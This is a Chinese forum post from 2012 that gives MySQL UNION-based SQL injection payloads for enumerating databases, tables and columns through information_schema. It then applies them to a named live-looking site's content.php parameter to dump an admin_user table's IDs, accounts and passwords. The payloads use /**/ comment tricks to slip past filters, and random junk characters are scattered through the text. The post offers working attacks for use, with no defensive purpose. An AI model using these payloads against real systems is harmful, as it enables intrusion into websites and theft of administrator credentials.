查库6 O5 M: o4 L d8 G" ?& X# T
# X" m6 M! g0 D Aid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
# Q- a% \# V% O5 a
% c8 c/ @+ P2 s+ q$ b查表
$ N. a4 p% V$ `4 f4 I
) W9 W) S% n/ gid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
6 v9 s. c- h7 g9 Z- M' k& D( X) S: z% m$ i7 v7 k1 T* ^6 w0 E
查段
0 p+ g) J$ J# A2 ]: W5 |$ U3 V1 @; H, G- k$ x/ x2 i# ]
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
5 w9 p5 W- Y) k5 U2 Y a. u6 e1 B+ m3 `* j" k5 q2 X
& A6 J% U7 y. D V
mysql5高级注入方法暴表' m5 u: @' u5 J, p+ G1 K; D
+ O4 @3 ^- k5 G- @: m4 L
例子如下:# \: G, [/ \, \: d0 O N7 Q
! d+ j% ^1 `% ?/ K, F: t0 d" T
1.爆表
d+ H5 \% ~ E6 K! ?9 uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
; g$ p: O5 y, h0 r( l+ j这样爆到第4个时出现了admin_user表。) \& U3 D1 ^4 U3 u5 w/ y. `! c
0 O. V6 W9 `5 Q \- g8 }
2.暴字段
5 d: t6 V1 Q4 c9 L' @- C# }http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
* J% P) ]# h; \% p0 H) e4 `
, r, _0 n7 n: w
) w! c! I2 d- q5 {3 ~3.爆密码6 |, h( R8 d' q) e+ P( c/ \: i
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
1 {; O5 j* V& `: D. D" c* _3 e, d0 N
* I; Z, J' l" j7 w& V; I |
发表于 2012-9-13 16:29:37
收藏
支持
反对